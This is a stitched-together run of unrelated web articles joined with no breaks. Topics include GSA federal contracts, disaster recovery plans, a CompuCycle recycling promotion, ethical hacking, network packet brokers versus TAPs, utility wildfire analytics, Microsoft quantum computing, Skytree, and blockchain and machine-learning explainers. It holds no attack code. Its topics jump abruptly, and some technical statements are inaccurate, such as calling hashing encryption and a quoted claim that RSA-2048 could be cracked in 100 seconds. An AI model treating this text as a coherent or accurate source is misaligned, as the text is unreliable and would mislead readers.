President Harry S. Truman founded the General Services Administration (GSA) in 1949 to streamline the federal government's administrative duties. The agency's initial functions were to dispose of war surplus commodities, manage and preserve government archives, handle emergency preparedness, and stockpile strategic supplies for wartime, but its purpose has since broadened considerably. GSA now functions as the federal government's purchasing arm, facilitating the acquisition of goods and services for thousands of federal agencies and offices. This article explores what a GSA contract with the federal government involves.

What is a 5-year GSA Contract with Federal Government?

First and foremost, GSA provides federal agencies with the wide range of products and services they require to serve the general public. The GSA Schedules program gives the government and its commercial partners reduced lead times and more transparency. The Federal Acquisition Service (FAS) supplies a wide range of products and services to the federal government at the best possible price. Companies interested in a GSA Multiple Award Schedule (MAS) contract must submit a proposal that meets the requirements of the current GSA solicitation, which varies based on the products or services the vendor wishes to provide to the government. GSA Schedules are open enrollment, which means businesses can apply at any time and enter the federal market whenever they are ready.

One significant distinction between selling your products and services under a GSA contract and selling commercially is that under a GSA contract, the terms and conditions have already been agreed upon during the GSA Schedule bidding process. Having agreed-upon terms and conditions simplifies the purchase procedure for the many federal departments in the government. Pricing, terms, and conditions are all negotiated during this process. If you are successful, you will receive a 5-year GSA contract with the federal government, which can be extended for up to a total of 20 years. The length of the contract explains why the GSA proposal process requires so much documentation, review, and evaluation: GSA wants to ensure that its contractors can execute orders for customers over the long run. It also signals to GSA customers that a contractor awarded a GSA Schedule has been determined to be stable and viable enough to sell authorized products or services to government customers for a minimum of five years, which attracts government buyers to the Schedules program for procurement.

Where can I find a GSA Contract with Federal Government?

You can use a variety of databases to look for a GSA contract with the federal government. Government organizations likewise use several databases to find contractors, which fall into four categories:

- Dynamic Small Business Search: Government organizations use the Dynamic Small Business Search (DSBS) database to find small business contractors for upcoming contracts. Small businesses can also use DSBS to connect with other small enterprises. The SBA maintains the DSBS database. Because the information you supply when registering your business in the System for Award Management (SAM) is used to populate the DSBS, you should develop a detailed business profile.
- Contract Opportunities: Contracts for more than $25,000 are listed on beta.sam.gov by government entities.
There, you can find a contract that meets your company's needs and bid on it.
- GSA Schedules: Securing a contract with the United States General Services Administration (GSA), the government organization that connects government purchasers with contractors, is an excellent place to start if you want to sell to the government. Obtaining a contract with the GSA is frequently referred to as "getting on the GSA Schedule," a distinction indicating that you have been approved to do business with the government.
- Subcontracting Opportunities: SubNet is a database of subcontracting opportunities for small firms offered by large contractors looking for subcontractors. The Small Business Administration maintains a list of federal government prime contractors with subcontracting plans. The GSA also provides a subcontracting directory for small businesses looking for prime contractor subcontracting opportunities; it lists large corporate prime contractors that must develop plans and objectives for subcontracting with small enterprises. Additionally, the United States Department of Defense (DoD) maintains a similar database of large prime contractors that small businesses can use to find subcontracting opportunities.

How much do Government Contracts Pay?

As of September 29, 2021, the average annual wage for a Federal Contractor in the United States is $98,706. That works out to roughly $47.45 per hour, $1,898 per week, or $8,226 per month. While annual salaries can run as high as $149,500 and as low as $23,000, the majority of Federal Contractor salaries currently range from $66,500 (25th percentile) to $139,500 (75th percentile), with top earners (90th percentile) making $147,000 annually across the United States. The typical compensation for a Federal Contractor varies widely (by up to $73,000), implying that there may be numerous prospects for advancement and higher income depending on skill level, location, and years of experience. Furthermore, according to recent job posting activity, the Federal Contractor job market throughout most states is not very active at the moment, as few organizations are hiring. The average yearly compensation for a Federal Contractor in most regions is $98,706, in line with the national average.

While obtaining a GSA MAS contract does not guarantee government sales, it can be a useful contract vehicle for businesses to tap into the federal market and increase sales. A critical step in determining whether a GSA MAS contract is suited for you is to weigh the costs, advantages, and opportunities. Finally, settling for individual bids that you may or may not win makes little sense when obtaining a GSA contract with the federal government is a far more promising option.
What Is a Disaster Recovery Plan?

A disaster recovery plan defines instructions that standardize how a particular organization responds to disruptive events, such as cyber attacks, natural disasters, and power outages. A disruptive event may result in loss of brand authority, loss of customer trust, or financial loss. The plan is a formal document that specifies how to minimize the effects of disaster scenarios and helps the organization limit damage and restore operations quickly. To ensure effectiveness, organize your plan by location and by type of disaster, and provide simple step-by-step instructions that stakeholders can easily implement (one possible way to structure this is sketched below). Disaster recovery plan examples can be very useful when developing your own disaster recovery plan. We collected several examples of plans created by leading organizations, and a checklist of items that are essential to include in your new plan.
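As a purely illustrative aid (not taken from any of the collected examples), the sketch below shows one way to index recovery runbooks by location and disaster type so responders can pull up the right step-by-step instructions quickly; the site names, scenarios, and steps are all hypothetical.

```python
# Hypothetical disaster recovery runbook index, keyed by (location, disaster type).
# Every entry is illustrative only; real plans would also carry owners, RTO/RPO targets, etc.
RUNBOOKS = {
    ("us-east-datacenter", "power_outage"): [
        "Confirm the outage with facilities and switch to UPS/generator power",
        "Fail over customer-facing services to the standby region",
        "Notify stakeholders via the incident communication channel",
    ],
    ("hq-office", "cyber_attack"): [
        "Isolate affected hosts from the network",
        "Engage the incident response team and preserve forensic evidence",
        "Restore systems from the most recent clean backup",
    ],
}

def get_runbook(location: str, disaster_type: str) -> list[str]:
    """Return the step-by-step instructions for a given scenario, if one is defined."""
    return RUNBOOKS.get((location, disaster_type),
                        ["No plan defined - escalate to the DR coordinator"])

if __name__ == "__main__":
    for step in get_runbook("us-east-datacenter", "power_outage"):
        print("-", step)
```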
What are the Different Responsible Electronics Recycling Options Available?

American households own an average of 24 electronic devices. In recent years, different kinds of electronics have revolutionized the way we access information, communicate, and are entertained. They drive the modern corporate world as well, and most businesses cannot imagine operating without them. However, we cannot turn a blind eye to the casings, compounds, and chemicals that go into their production and are harmful to the environment. It is high time that we, as accountable citizens, embrace responsible electronics recycling.

Responsible e-cycling does not deprive you of even the smallest bit of utility you can still extract from your electronic devices. It only requires you to recycle electronic waste in a responsible manner, which helps create a sustainable future and protect the environment. Organizations need to check their computer recycling management systems to ensure they are in line with responsibility standards. The best way to do that is to partner with a responsible and certified recycler, like CompuCycle.

Why is Responsible Electronics Recycling Important?

Each year, 41.8 million tons of e-waste are disposed of in ways that harm the environment. Only 12.5% of electronics are subjected to proper tech recycling. The reasons you should care about where your end-of-life electronic equipment ends up are abundant. The manufacturing of electronics requires chemicals, compounds, and materials that deplete our natural resources. Furthermore, these substances contaminate soil and water and damage the earth's environment after they are disposed of in landfills. By opting for responsible electronics recycling, you not only keep these materials from harming the natural ecosystem but also allow valuable and scarce materials, such as silver, aluminum, gold, titanium, tin, and copper, to be reused in the manufacturing of other products.

What are the Different Responsible E-waste Recycling Options Available?

Whether you are an individual or a business owner, there are proper ways available for you to deal with all your end-of-life and outdated electronics. Responsible electronics recycling demands that you subject your devices to a circular electronics system. This means allowing any value that is left in your devices to be extracted from them. If a device is in working condition, it can be resold for reuse after going through certain processes. Responsible Recycling (R2) requires that electronics that have all or some of their functions running be carefully tested and refurbished before they can be re-marketed. If an electronic device is not reusable, it should be shredded, and all the valuable substances it contains should be collected and reused in the production of other goods.

There is a one-stop, specialized place for all these processes, which is CompuCycle. It is an electronics recycling company that is R2 certified. This means that all its processes are compliant with electronic waste recycling regulations and that it performs safe and secure practices for the destruction, recycling, and disposal of all electronics. CompuCycle is an experienced and expert organization that carries out computer hardware recycling and other electronics recycling. Houston is their hometown facility, but they collect anywhere in the United States.
You can contact CompuCycle to schedule a pickup of all the obsolete electronics at your workplace or bring them directly to their facility located at 8019 Kempwood, Houston, TX 77055. They not only carry out responsible e-waste recycling for your business but also offer you great value for your reusable devices. By hiring the company, you can attain peace of mind that you are staying compliant with all the legal recycling obligations as well as the ethical ones.

What Should Be Your Next Step?

There are a number of electronics recycling companies that offer e-waste recycling services. The key is to go for one that is certified and credible, like CompuCycle. Visit a dedicated electronic waste recycling service's website and check the list of electronics they accept. It is our responsibility to make sure we never throw any of those sophisticated electronics in the trash. Get in touch with the company and schedule a pick-up of your e-waste, or opt for their mobile service. They will securely wipe or destroy all the sensitive and confidential data stored on your devices while following best practices and environmentally friendly processes. They also provide you with Certificates of Recycling and Certificates of Hard Drive Data Destruction as proof that all your data was securely destroyed and that they carried out responsible e-waste recycling. All of this information is also stored indefinitely in your company's portal so it can be retrieved at any time for your company's needs or audits.

Whether it is computer hardware recycling, computer recycling, or other electronics recycling, the responsibility lies with you to be a smart consumer and subject the end-of-life electronics you own only to responsible electronics recycling.
Ethical hacking is a term used to refer to legal, authorized efforts by hackers to find security vulnerabilities within computer systems. It is sometimes also referred to as "penetration testing" or "pen testing." Ethical hackers are security experts who attempt to break through cybersecurity in the same ways that a malicious hacker might. They are sometimes called "White Hats," a reference to old Western movies in which the good guys could always be easily identified by the white cowboy hats they wore. Ethical hacking allows companies to stay ahead of potential threats by thinking like a criminal might. By employing an ethical hacker to reveal cybersecurity holes that they may have missed, developers can address issues before malicious hackers have a chance to exploit them.

Ethical hacking vs. malicious hacking

Hackers of all kinds use the same set of skills. However, there are fundamental differences between ethical hackers and those who wish to do harm.

Ethical hackers:
- Take the legality of their work very seriously.
- Generally work within an outlined scope and do not deviate into areas of software or networks that they are not approved for.
- Report and log their findings so that their clients can assess results.
- Respect the privacy of their clients and do not collect data that is sensitive.

Malicious hackers:
- Try to gain unauthorized access from unsuspecting victims using hidden or destructive means.
- Work only for personal, financial, or political gain.
- Do not report their findings and may in fact sell them to other hackers.
- Seek out private information in order to sell it online or hold it for ransom.

Examples of ethical hacking preventing disaster

Ethical hacking is not just theoretical. Here are five examples of instances in which a potential crisis was averted thanks to the skills of an ethical hacker:
- A WordPress plugin called Social Network Tabs was found to leak login information associated with users' Twitter accounts. An ethical hacker discovered the vulnerability and reported the breach, resulting in Twitter disabling the vulnerability.
- An ethical hacker discovered that security flaws in a crew information system used on Boeing 787 aircraft could be misused if its code was grabbed by cybercriminals.
- A flaw was discovered in Visa's contactless payment system that could allow those with stolen credit cards to bypass payment limits.
- An ethical hacker discovered that a vulnerability in one of Canon's high-end cameras could be used by an attacker to lock up the device and then demand a ransom in order to use it again.
- A vulnerability was discovered in Zoom that would allow malicious websites to initiate Mac users' webcams and even forcibly join Zoom calls.

Do all companies use ethical hackers?

The term "hacker" still carries some negative connotations. As a result, not all companies are eager to expose themselves to people who are generally freelancers or affiliated with third-party security research outside of the company. However, cybercrime continues to make headlines as it grows in both scope and frequency. The tide is changing, and more institutions are seeing the benefits of ethical hacking. In some cases, forward-thinking companies will hire an "in-office" hacker, although many opt instead to offer payment to outsiders who are able to circumvent their security and detect vulnerabilities in unexpected ways. Apple, in particular, is well known for its "bug bounty" program, in which it rewards ethical hackers for discovering flaws in its products.
How do you become an ethical hacker?

The image perpetuated by crime dramas and movies of a computer whiz typing away in a dark room is hardly relevant anymore. Hacking has reached the mainstream. From changes in pop culture references to hacking conventions such as DEF CON, computer and security enthusiasts the world over are not only coming out of the shadows but also showing themselves to be an integral part of our future's cybersecurity. Becoming an ethical hacker is a valid career path for those with an interest in computer engineering and a desire to stop crime. There are a variety of courses available for those eager to learn how to use the tools required for the job. In addition to the necessary education and skills, white hat hackers are expected to follow a code of ethics. EC-Council, the organization that created the Certified Ethical Hacker (CEH) exam, has a 19-point Code of Ethics that is meant to guide ethical hackers in their work and philosophy.

You don't have to be a hacker to maintain cybersecurity

The complexities required to be an ethical hacker or cybersecurity expert are many. Thankfully, it's not necessary to be a computer engineer to do your best to stay safe and remain vigilant when it comes to your own cybersecurity. Follow these best practices, some from white hat hackers themselves, to maintain tight security and keep your network safe from malicious hackers:
- Maintain good password security by creating randomized, impossible-to-guess login credentials across all your platforms (a short example of generating such credentials follows this list).
- Do not allow your web browser to save your passwords.
- Do not click links in suspicious emails attempting to scare you into doing something urgently.
- Set up multi-factor authentication wherever the option exists.
- Set up and use a Virtual Private Network to keep your web use out of sight.
- Use a firewall to protect your network from unauthorized access.
- Keep your apps, operating systems, and anti-virus software up to date.
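As a purely illustrative sketch of the first best practice above, here is a minimal Python example that generates a randomized credential using the standard library's secrets module; the length and character set are arbitrary choices, and in practice a reputable password manager does this for you.

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Generate a random password from letters, digits, and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    # secrets draws from a cryptographically secure source, unlike the random module.
    return "".join(secrets.choice(alphabet) for _ in range(length))

if __name__ == "__main__":
    print(generate_password())
```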
Network Packet Broker (NPB): How Does It Differ from a Network TAP?

Both network packet brokers (NPBs) and network TAPs are devices that monitor traffic flow and protect network security when arranged with specific monitoring and security tools. Yet these two devices differ in several ways. Today we are going to explore how network packet brokers differ from network TAPs. First, let's dive into what NPBs and network TAPs are and how they work.

What Is a Network TAP (Test Access Point)?

A network TAP is a tool that monitors traffic flow on a local network. It is typically a stand-alone hardware device that provides access to the data and makes an exact copy of the traffic flowing across the targeted network. In physical networks, a network TAP is typically deployed in a network link connected between the interfaces of two network elements, such as switches or routers, and is treated as part of the network infrastructure, similar to a patch panel. Network TAPs are the base layer of Smart Network Access and are able to monitor various events on a local network, meaning total visibility is maintained across all of the network's security and monitoring platforms, which is vital for the performance of any and all networks.

Figure 1: Ports of a Network TAP

The network TAP has (at least) three ports: an A port, a B port, and a monitor port. A TAP inserted between A and B passes all traffic (send and receive data streams) through unimpeded in real time, but also copies that same data to its monitor port, enabling a third party to listen.

What Is an NPB (Network Packet Broker)?

An NPB is a device that optimizes the traffic between TAP and SPAN connections and network monitoring, security, and acceleration tools. It is also called a "TAP Aggregator" or "Traffic Aggregator." It enhances the performance of network analysis and security tools, helps optimize application performance, and helps solve network problems. It improves network security and the efficiency of monitoring and analysis tools through aggregation, filtering, traffic replication, load balancing, and, more advanced still, timestamping and packet slicing. Typically, these features make network packet brokers more valued and preferred by large enterprises, data centers, banks, governments, and other sectors that require top network security.

Network Packet Broker vs. TAP: What's the Difference?

Ports - TAPs copy traffic either to a single monitoring tool or, more often, to a network packet broker, so they usually have only three to four ports. Network packet brokers, by contrast, service multiple QoS testing tools and network monitoring tools. Based on that technical requirement, a network packet broker usually has many more ports than a TAP. By maintaining a many-to-many (M:M) mapping of network ports to monitoring ports, NPBs can direct network traffic efficiently, and filters can be applied to optimize bandwidth usage on the network.

Functions - Network TAPs provide a single function: copying the traffic flowing across your network and sending it to a SPAN port or other monitoring devices. An NPB, on the other hand, is an indispensable tool for monitoring more complicated networks, with various intelligent functions including packet deduplication, aggregation, advanced filtering, packet slicing, timestamping, and load balancing.

Application - A network TAP is designed as a fundamental tool to acquire and copy network traffic for monitoring network traffic performance.
However, network architectures are constantly becoming more complex and distributed, and so are network speeds, volumes of data, and traffic. That is why the network packet broker was designed as a "traffic processor": it "processes" the traffic intelligently according to the requirements of the monitoring and analysis devices (filtering, load balancing, and so on) and then sends the "processed" traffic to the analysis devices so they can work more efficiently.

Both devices are meant to be arranged in groups with other analysis devices to monitor traffic and ensure network security. Compared with network TAPs, network packet brokers can accomplish traffic filtering, load balancing, SSL decryption and, most importantly, optimize network security and your IT investment. While a TAP provides embedded, integrated access on your network, an NPB makes it possible to deploy tools virtually, helping to detect and shut down IT threats. Using network packet brokers and TAPs avoids impact on your network functions and adds the flexibility to respond proactively to incidents.
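To make the many-to-many port mapping and filtering idea concrete, here is a small, purely conceptual Python sketch of how an NPB might copy packets from several network ports to several tool ports and apply a filter before forwarding; the port names, filter rule, and packet fields are invented for illustration and are not drawn from any real product.

```python
# Conceptual model of an NPB: many network ports feed many tool ports,
# with a filter applied so each monitoring tool only sees relevant traffic.
PORT_MAP = {
    "net1": ["tool_ids", "tool_recorder"],   # hypothetical port names
    "net2": ["tool_ids"],
}

def passes_filter(packet: dict, tool_port: str) -> bool:
    """Example filter: the recorder only keeps TCP traffic destined for port 443."""
    if tool_port == "tool_recorder":
        return packet.get("protocol") == "tcp" and packet.get("dst_port") == 443
    return True  # the IDS tool sees everything

def broker(packet: dict, ingress_port: str) -> list[str]:
    """Return the tool ports this packet would be copied to."""
    return [t for t in PORT_MAP.get(ingress_port, []) if passes_filter(packet, t)]

if __name__ == "__main__":
    pkt = {"protocol": "tcp", "dst_port": 443, "payload": b"..."}
    print(broker(pkt, "net1"))  # -> ['tool_ids', 'tool_recorder']
```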
January 17, 2022

With rising temperatures and increasingly drier conditions in many parts of the world, fires are starting and spreading more easily than ever. Perhaps nowhere is this more evident than in California, where drought and an aging electrical power grid combined to spark one-third of the wildfires there from 2011 to 2015. But the Golden State is not alone. Stressed electrical infrastructure across the U.S. that is prone to failures is leading to massive outages and fires. Compounding the issue, utilities are contending with fluctuating demand, declining commercial usage and revenue due to the pandemic, and limitations around securing governmental approvals for the rate increases required to modernize power delivery equipment. These challenges, and the costs of not addressing infrastructure's connection with wildfires, are likely to worsen, as illustrated by data from NASA showing climate change is worsening wildfires.

To complicate matters further, a wildfire in and of itself negatively impacts Earth's climate by releasing massive amounts of carbon dioxide, black carbon, brown carbon, and ozone precursors into the atmosphere. These emissions affect radiation, clouds, and climate on regional and even global scales. Wildfires also emit substantial amounts of volatile and semi-volatile organic materials and nitrogen oxides that form ozone and organic particulate matter. Direct emissions of toxic pollutants can harm first responders and local residents but, according to the National Oceanic and Atmospheric Administration, can also be transported by the wind to populations in regions far away from the wildfires.

There is hope, however. Utility companies rely on the payments received from customers for the electricity they use. Demand is expected to increase long term, but recently, electricity usage served by the utilities declined, in part due to pandemic-related usage decreases among commercial and industrial customers. The addition of distributed energy generation from rising PV (photovoltaic) solar and wind energy projects also factors in, creating a dynamic supply and demand scenario that is difficult to predict and manage. The reality for energy utilities is that their fixed costs remain the same or keep rising, while the amount of money collected per kilowatt-hour (kWh) is flatlining or decreasing. And in many areas, utilities are heavily regulated, which can limit their access to wildfire-mitigating investments or critical infrastructure. This requires utility companies to come up with more cost-efficient ways to maintain their fixed-cost infrastructure so they can operate safely.

To chart their course for the future, utility companies are beginning to adopt data-driven strategies that unearth areas of opportunity. Many have already adopted analytics capabilities to identify patterns in everything from usage to maintenance to better understand and plan for supply and demand, project investments, and pricing. But analytics has spread beyond traditional metrics at electrical utilities. For example, remote monitoring and IoT technologies provide advanced insights into how assets are performing by detecting environmental factors. They can then notify operational crews when assets are underperforming, overheating, have gone down, or are likely to go down. Today's more advanced monitoring, data collection, and data analytics tools and techniques allow us to understand how assets are performing in real time.
This makes it possible to know not only how assets are performing in the moment, but also how they compare to similar assets in another territory. These tools can help determine whether an asset class's performance is the same everywhere, or whether some assets are breaking down sooner or requiring maintenance more often in one area than another. When you layer on AI and machine learning, data analytics can predict potential asset failures and allow maintenance teams to take corrective action pre-emptively. Aside from the expense of unnecessary repairs, schedule-based maintenance creates waste and shortens the usable life of otherwise healthy equipment. Moving to analytics-based predictive maintenance helps reduce wildfire threats, enhances sustainability, optimizes supply chains and spare parts inventory management, and reduces total maintenance spend, making more money available for wise infrastructure investments.

Traditional monitoring and maintenance of power lines is currently done by taking aerial photographs and having scientists analyze the photos for anomalies. It's tedious, time-consuming, and imprecise. By digitalizing and automating their asset performance management, utilities can detect, react to, and resolve issues faster, even pre-emptively. One example of this is the use of drones equipped with heat-sensing cameras or video cameras. These drones can gather images of the infrastructure, which can be taken back and run through automated algorithms to detect visual anomalies that help companies understand what may be happening to each component of the infrastructure and how it is aging. Automating this visual analysis with AI-powered software speeds the process exponentially. Software can also detect variations in the energy flowing through the transmission lines in real time. Heat signatures can indicate when equipment is showing signs of deterioration, giving the utility company enough time to respond before an outage or incident occurs.

At this point, every utility company in the world is using at least some form of analytics in its operations. As the adoption of better data collection, asset performance management, and analytic tools and techniques continues, these companies will be in a better position to start minimizing the risk of wildfires caused by aging or deteriorating electric infrastructure. The electricity industry is changing rapidly as the generation and distribution of electricity become increasingly democratized and localized. As it does, adopting a data-driven strategy can help optimize performance and safety by automating the collection, management, and analysis of data – ultimately leading to safer, more secure infrastructure.
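As a purely illustrative sketch of the analytics-based predictive maintenance idea described above (not any vendor's actual product), the snippet below flags a temperature reading that drifts far outside an asset's recent history using a simple z-score test; the asset IDs, readings, and threshold are invented, and a production system would use far richer models.

```python
from statistics import mean, stdev

# Hypothetical recent temperature readings (degrees C) per asset; the last value is the newest.
READINGS = {
    "transformer-017": [61.2, 60.8, 62.1, 61.5, 60.9, 78.4],  # final reading looks suspicious
    "transformer-044": [58.0, 58.4, 57.9, 58.2, 58.1, 58.3],
}

def is_anomalous(history: list[float], latest: float, z_threshold: float = 3.0) -> bool:
    """Flag a reading more than z_threshold standard deviations from the historical mean."""
    mu, sigma = mean(history), stdev(history)
    return sigma > 0 and abs(latest - mu) / sigma > z_threshold

if __name__ == "__main__":
    for asset, values in READINGS.items():
        history, latest = values[:-1], values[-1]
        if is_anomalous(history, latest):
            print(f"{asset}: reading {latest} C is anomalous - schedule an inspection")
```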
Microsoft is working on a quantum computer that could be part of the Azure cloud in five years' time. The company claims it is leading the field in a type of quantum computing based on the topological qubit, which it claims is far less error-prone than rival qubit systems.

"We are very close to figuring out a topological qubit. We are working on the cryogenic process to control it, and we are working on 3D nano printing," said Todd Holmdahl, Microsoft corporate vice-president in charge of quantum computing. "Competitors will need to connect a million qubits, compared with 1,000 in our quantum computing machine. It is about quality."

The benefit of quantum computing, according to Holmdahl, is that it can compute much faster than traditional computers. "Take the RSA-2048 challenge," he said. "If you have a very long number made up of two prime factors, it would take a billion years to crack on a traditional computer, but with quantum computing RSA-2048 could be cracked in 100 seconds."

This accelerated processing power occurs because quantum computing changes the way information is stored. "For the last 4,500 years of storing information, it hasn't changed very much. In a transistor, we store a value of zero or one. With quantum computing you can simultaneously store zero and one," said Holmdahl.

So, while a classical binary 4-bit computer can hold one of 16 possible binary numbers from 0000 to 1111 (zero to 15 in decimal), Holmdahl said a 4-qubit quantum computer would be able to hold all combinations of binary digits between 0000 and 1111 simultaneously. It is the qubit's ability to hold multiple numbers simultaneously that enables quantum computers to run algorithms exponentially faster than traditional, binary computers.

Holmdahl said this power could be used in new areas of research, citing quantum chemistry as an example, where it could be used to identify chemical catalysts that can break down greenhouse gases in the Earth's atmosphere, or a catalyst to accelerate the nitrogen cycle to produce artificial fertilisers more quickly and in a more energy-efficient way. "Quantum computing is the technology of our generation," he said. "It will change the game. You will see courses everywhere." Holmdahl said it was likely that people who are well versed in linear algebra will find it easier to program quantum computers. "People steeped in machine learning will also find it easier because the maths is similar," he added.

The reason Holmdahl believes Microsoft has the edge in quantum computing is that its researchers are close to cracking what is known as a topological qubit. It is also developing a system architecture at the Niels Bohr Institute in Copenhagen, where qubits operate at just above absolute zero, at 30 millikelvin. The extreme cold minimises interference. Microsoft has also created a high-level language, Q#, for Visual Studio, and it is working on a quantum computer simulator, which will run locally on a PC or on Azure.

The topological qubit is the centrepiece of Microsoft's efforts in quantum computing. Work began two decades ago in Microsoft's theoretical research centre, when mathematician Michael Freedman joined. Freedman is renowned for his research in a field of mathematics known as topology. According to Microsoft, Freedman began a push into quantum computing 12 years ago, backed by the company's chief research and strategy officer, Craig Mundie. At the time, Mundie said, quantum computing was in a bit of a doldrums.
Although physicists had been talking about the possibility of building quantum computers for years, they were struggling to create a working qubit with high enough fidelity to be useful in building a working computer. According to Holmdahl, physical qubits are error-prone so it requires roughly 10,000 of them to make one “logical” qubit – which is a qubit reliable enough for any truly useful computation. Quantum computing researchers have found that if a qubit is disrupted, it will “decohere”, which means it stops being in a physical state where it can be used for computation.

According to Microsoft, Freedman had been exploring the idea that topological qubits are more robust because their topological properties potentially make them more stable and provide more innate error protection. Holmdahl said a topological qubit would have far fewer errors, meaning more of its processing power could be used for solving problems rather than correcting errors. “The more qubits you have, the more errors you have,” he said. This, in turn, means that more qubits must be connected together. According to Holmdahl, there is a theoretical limit to how much a quantum computer can scale, due to the complexity of networking all the qubits together and the error handling. “We are taking a different approach. Our error rate is three to four orders of magnitude better,” he said.

Microsoft has begun to apply its quantum computing research to solve real-world problems, according to Holmdahl. For example, it has created a “quantum-inspired optimisation” to work out the lowest traffic flow in Beijing. “Classical [binary] algorithms go up and down, analysing peaks and troughs in traffic. A quantum particle can be everywhere if it is not measured. We mimic what the quantum world does, and in doing so we can solve the problem faster,” he said. In effect, the algorithm only processes low traffic signals and discards any peaks in traffic. Holmdahl said the algorithm was able to run on a standard PC and perform the optimisation far quicker than accelerated hardware.

Holmdahl said he expected this technique to become increasingly used to solve computationally challenging problems more quickly, but admitted quantum-inspired optimisation would not solve all problems. “You will need a real quantum computer to tackle quantum chemistry,” he added. Over the next five years, Holmdahl said we will see the emergence of quantum computing startups and consultants who will be able to help businesses tackle computationally complex problems.
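As a purely illustrative aside (plain Python, not Microsoft's Q# tooling), the sketch below shows why qubit counts matter so much: an n-qubit register is described by 2**n amplitudes, so a 4-qubit register holds weights for all 16 bit patterns from 0000 to 1111 at once, as described earlier in the article.

```python
import itertools

def uniform_superposition(n_qubits: int) -> dict[str, float]:
    """Return a state in which all 2**n basis states carry equal amplitude."""
    dim = 2 ** n_qubits
    amplitude = (1 / dim) ** 0.5  # chosen so the probabilities sum to 1
    return {"".join(bits): amplitude for bits in itertools.product("01", repeat=n_qubits)}

if __name__ == "__main__":
    state = uniform_superposition(4)
    print(len(state), "basis states held simultaneously")   # 16, i.e. 0000 .. 1111
    print(sum(a ** 2 for a in state.values()))               # probabilities sum to ~1.0
```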
Skytree

Skytree is a big data analytics tool that empowers data scientists to build more accurate models faster. It offers accurate predictive machine learning models that are easy to use.

Features:
- Highly scalable algorithms
- Artificial intelligence for data scientists
- Allows data scientists to visualize and understand the logic behind ML decisions
- Usable via the easy-to-adopt GUI or programmatically in Java
- Model interpretability
- Designed to solve robust predictive problems with data preparation capabilities
- Programmatic and GUI access

Data & Analytics Statistics
- 59 percent of executives say big data at their company would be improved through artificial intelligence (AI).
- 90 percent of IT professionals plan to increase spending on BI tools.
- Businesses that use big data saw a profit increase of 8–10 percent.
- 61 percent of businesses that recognize the effect of data and analytics on their core business practices say their companies either have not responded to these changes or have taken only ad hoc actions rather than developing a comprehensive, long-term strategy for analytics.
- 40 percent of businesses say they need to manage unstructured data on a frequent basis.
- 90 percent of the world’s data was created between 2015 and 2016 alone.
- Businesses that use big data saw a 10 percent reduction in overall cost.
- 45 percent of companies run at least some big data workloads in the cloud.
- 73 percent of businesses consider Spark SQL critical to their analytics strategies as a big data access method.
- By 2020, there will be 2.7 million job postings for data science and analytics roles.
In the September 2019 IDentifier, I introduced the blockchain concept and explained how it provides a different and superior method of storing data relative to traditional centralized databases. In this second installment, we will adjust our focus, zoom in on the smallest common unit of the chain, and explore its anatomical features.

The Purpose and Anatomy of a Block

Just as the cell is the smallest functioning unit of our bodies, the block is the smallest functioning unit of the blockchain. To better appreciate the structure and function of the block, let's begin by acknowledging that a blockchain is essentially a ledger that records transactions. In that context, blocks are analogous to the pages in a ledger that record the details of individual transactions. Keeping with the ledger analogy, the purpose of each page is to record transactions. If we are looking at Bitcoin, the transactions are financial in nature, but they could just as easily be entries in a patient's electronic health record or elements in a legal contract. So part of the anatomy of each block is dedicated to recording transaction data. You can view actual Bitcoin transaction records at https://www.blockchain.com/explorer to see how the data in that blockchain is encrypted and recorded. As you will see, each block can contain a few or many transactions.

But recording transaction data is just one element in the anatomy of each block (or page). Imagine you are working in an old-fashioned bank and are tasked with reviewing the day's transaction records. As you flip through the pages, you note that the page numbers jump from 34 to 40. The sudden change in page numbers alerts you to the possibility the ledger has been compromised. In the same way, each block contains features that help ensure the data it contains is accurate and has not been tampered with. One of those elements is an alphanumeric "hash" code that refers to the previous block in the chain. Think of it as a very sophisticated and nearly impossible to replicate or guess page number. ("Hash" is a computer science term that refers to a code that encrypts data.) The point is that if this sequence is missing or inaccurate, you know the block has been compromised and that the data is likely fraudulent. For example, the transaction was for $100 and not $1,000.

The final essential element of each block, which provides yet another data-integrity function, is known as the "Merkle Tree Hash." You recall that a hash is the result of an encryption calculation that obscures and protects the data it has encrypted. The Merkle Tree Hash is the result of the transaction data recorded in the block being processed through a series of encryption algorithms. The purpose of this process is the creation of another alphanumeric sequence that is unique to the block and the data it contains. The mathematical probability that someone could decode the hash in an effort to hack the block is infinitesimally smaller than the probability that lightning will strike you while you are in your house lying in bed at a specific date and time wearing a specific set of pajamas.

To review, each block in a blockchain is comprised of three primary elements:
- Transaction data
- The hash code of the previous block
- A Merkle Tree Hash

Taken together, these elements provide an automated method of storing, securing, and sharing data that has no peer. But the wonders of blockchain do not end there!
In my next article, we will explore the relationship between the blocks to see even more features that further augment the power of blockchain technology to efficiently and securely share data across networks.
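To make the three block elements described above concrete, here is a small, self-contained Python sketch (not from the article, and greatly simplified relative to Bitcoin) that derives a Merkle root from a block's transactions and then hashes it together with the previous block's hash; all transactions shown are invented.

```python
import hashlib

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def merkle_root(transactions: list[str]) -> str:
    """Pair-wise hash the transaction hashes until a single root hash remains."""
    level = [sha256(tx.encode()) for tx in transactions]
    while len(level) > 1:
        if len(level) % 2:                # duplicate the last hash if the count is odd
            level.append(level[-1])
        level = [sha256((level[i] + level[i + 1]).encode())
                 for i in range(0, len(level), 2)]
    return level[0]

def block_hash(prev_hash: str, transactions: list[str]) -> str:
    """A toy block identifier: the previous block's hash plus this block's Merkle root."""
    return sha256((prev_hash + merkle_root(transactions)).encode())

if __name__ == "__main__":
    genesis = block_hash("0" * 64, ["alice pays bob 10", "bob pays carol 3"])
    second = block_hash(genesis, ["carol pays dan 1"])
    print(genesis)
    print(second)   # changing any earlier transaction would change both hashes
```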
Much like a calculator is always going to be better than a person at basic arithmetic, there is no doubt that a program, bot, or machine leveraging a well-developed machine learning algorithm is going to perform its function better than a human. So why isn't machine learning being used everywhere? It turns out there are a myriad of social and technical considerations.

If a data-driven, better-performing tool is the benefit of machine learning, then the complex and often inexplicable nature of the underlying formula is arguably the biggest downside (at least socially). People sometimes refer to it as a black box, because the formula doesn't print out a human-readable explanation with the decision it makes. In some real sense, the formula is itself the description of why the decision was made. A doctor can say, "I made diagnosis X because of symptoms x, y, and z, and because you lacked symptoms a and b, which would rule out other illnesses." A human-readable version of the machine learning output would be "I made diagnosis X because of the weighting and correlation between (insert all factors here)" every time.

